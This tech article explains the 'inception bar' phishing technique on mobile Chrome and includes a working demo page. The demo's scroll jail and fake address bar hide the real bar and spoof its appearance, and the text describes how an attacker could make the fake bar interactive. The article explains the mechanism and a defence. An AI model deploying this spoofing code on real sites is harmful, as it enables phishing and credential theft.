Phishing isn’t exactly a new topic in cybersecurity, but new and creative ways of carrying it out turn up often. One such way is the newly discovered and cleverly titled “inception bar”, a potential phishing technique recently demonstrated by developer James Fisher.
This attack takes advantage of how mobile Chrome displays the address bar. As you scroll down, Chrome hides the address bar to give the webpage more room, and that is exactly where the so-called “inception bar” comes in: the page draws its own fake address bar in the space the real one just vacated. Normally the real bar reappears as soon as you scroll back up, but the attacker can craft the page so that it never does, using what Fisher calls a “scroll jail”: the page’s content is locked inside an overflow container, so your scrolling moves the container’s contents rather than the page itself, and Chrome never sees the upward page scroll that would bring its bar back. If you scroll up too far, the page even shows a fake page refresh to cover the seam.
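To make the mechanism concrete, here is a minimal page, added for this article as an illustration and not Fisher’s own proof-of-concept code, that reproduces the structure just described: a tall document so the first downward scroll makes Chrome hide its real bar, then a fixed full-screen “jail” container that takes over all scrolling, a deliberately obvious placeholder fake bar at the jail’s top, and a fake refresh that snaps the jail back whenever the user scrolls up past the bar. The threshold value, the element names and the placeholder spoofed URL are assumptions made for the demo, and `overscroll-behavior: contain` is a standard CSS property used here to stop scroll chaining; the article does not say how Fisher’s page handled that detail.

```html
<!doctype html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
  body { margin: 0; font: 16px sans-serif; }

  /* Real page content. It is tall so the document can be scrolled: the user's
     first downward scroll is what makes Chrome collapse its real address bar,
     and the document stays tall so Chrome never treats the page as too short
     and forces the bar back. */
  #page { padding: 16px; min-height: 400vh; }

  /* The scroll jail: a fixed, full-viewport element that takes over all
     scrolling once the real bar is hidden. overscroll-behavior: contain
     stops scroll chaining, so hitting the top or bottom of the jail does
     not scroll the document, which is what would bring the real bar back. */
  #jail {
    display: none;
    position: fixed; inset: 0;
    overflow-y: auto;
    overscroll-behavior: contain;
    background: #fff;
  }

  /* The "inception bar": ordinary page content styled to resemble the
     browser's address bar. A real attack would use a pixel-accurate image
     of the target browser's bar; this placeholder is intentionally obvious. */
  #fake-bar {
    position: sticky; top: 0;
    height: 56px; line-height: 56px; padding-left: 16px;
    background: #f1f3f4; border-bottom: 1px solid #dadce0;
  }

  /* Spacer above the content so the jail normally sits below scrollTop 0;
     scrolling up into it triggers the fake refresh. */
  #refresh { height: 80px; line-height: 80px; text-align: center; color: #5f6368; }
  #jail-content { padding: 16px; min-height: 300vh; }
</style>
</head>
<body>
<div id="page">Scroll down a little to hide the real address bar.</div>

<div id="jail">
  <div id="refresh"></div>
  <div id="fake-bar">&#128274; https://example.com/ (fake bar: this is page content)</div>
  <div id="jail-content">Now scroll up and down: the real bar does not come back.</div>
</div>

<script>
  // Assumed threshold (demo value): roughly the height of Chrome's address
  // bar. Once the document has scrolled past it, the real bar is collapsed
  // and the jail can take over without the user noticing the handoff.
  var BAR_HIDDEN_THRESHOLD = 80;
  var jail = document.getElementById('jail');
  var refresh = document.getElementById('refresh');
  var engaged = false;
  var refreshing = false;

  window.addEventListener('scroll', function () {
    if (engaged || window.scrollY < BAR_HIDDEN_THRESHOLD) return;
    engaged = true;
    jail.style.display = 'block';
    // Start just below the spacer so the fake bar sits at the very top of
    // the viewport, exactly where the real bar was a moment ago.
    jail.scrollTop = refresh.offsetHeight;
  });

  // Fake "pull to refresh": if the user scrolls up past the fake bar into
  // the spacer, show a refresh message and snap back beneath it, so the
  // jail never hands the gesture on to the document.
  jail.addEventListener('scroll', function () {
    if (refreshing || jail.scrollTop >= refresh.offsetHeight) return;
    refreshing = true;
    refresh.textContent = 'Refreshing...';
    setTimeout(function () {
      refresh.textContent = '';
      jail.scrollTop = refresh.offsetHeight;
      refreshing = false;
    }, 400);
  });
</script>
</body>
</html>
```

Open it in Chrome on a phone: after the first downward scroll the fake bar occupies the spot the real one vacated, and scrolling up no longer restores the real bar. To confirm that the document itself has stopped moving, attach desktop Chrome over USB via chrome://inspect and watch window.scrollY in the console: it stops changing once the jail is engaged, while jail.scrollTop does all the work. Locking and unlocking the phone still brings the real bar back, as the article notes.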
In Fisher’s proof of concept the fake bar is just a static image that spoofs HSBC’s address (and it occasionally glitches, showing both bars at once), but nothing stops a more enterprising attacker from building an interactive, dynamic bar with the same tools. A fake address bar and menu with working interactivity would be far more convincing. At that point, even typing the proper URL after noticing something sketchy wouldn’t help, because you’d be typing it into the fake bar. Worse, a well-engineered site could fetch content from whatever URL you manually enter and display it under the fake bar, so that once you had loaded a site with the inception bar, you would have little way to know if or when you ever left it, hence the name.
You can, however, force the real address bar to reappear by locking and then unlocking your phone. So the trick isn’t bullet-proof, but many people won’t know to try this and might be fooled.